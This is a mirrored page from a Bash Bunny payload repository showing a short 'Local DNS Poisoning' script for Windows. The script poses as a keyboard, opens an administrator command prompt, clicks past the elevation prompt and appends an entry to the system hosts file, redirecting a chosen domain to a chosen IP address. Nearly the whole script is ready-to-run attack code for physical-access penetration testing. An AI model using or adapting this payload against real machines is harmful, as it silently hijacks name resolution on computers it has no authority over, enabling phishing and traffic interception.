mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
* Local hosts DNS spoofing attack This is a simple hosts DNS spoofin attack, where the target gets redirected to a set IP when going to a certain website. * Create README.md * Update README.md
29 lines
535 B
Plaintext
29 lines
535 B
Plaintext
#Title: Local DNS Poisoning
|
|
#Description: Attacks the host file to redirect a website of your chosing for a given domain
|
|
#Author: DavidSpek
|
|
#Props: ashbreeze96 and overwraith
|
|
#Target: Windows (Including 10 latest build)
|
|
|
|
|
|
LED R 200
|
|
|
|
ATTACKMODE HID
|
|
LED STAGE1
|
|
Q GUI x
|
|
Q DELAY 50
|
|
Q A
|
|
Q DELAY 500
|
|
Q LEFTARROW
|
|
Q DELAY 50
|
|
Q ENTER
|
|
Q DELAY 100
|
|
Q STRING set file="%windir%\System32\drivers\etc\hosts"
|
|
Q DELAY 50
|
|
Q ENTER
|
|
Q STRING 'echo 10.1.1.0 test.com>>%file%'
|
|
Q DELAY 50
|
|
Q ENTER
|
|
Q STRING exit
|
|
Q ENTER
|
|
|
|
LED FINISH |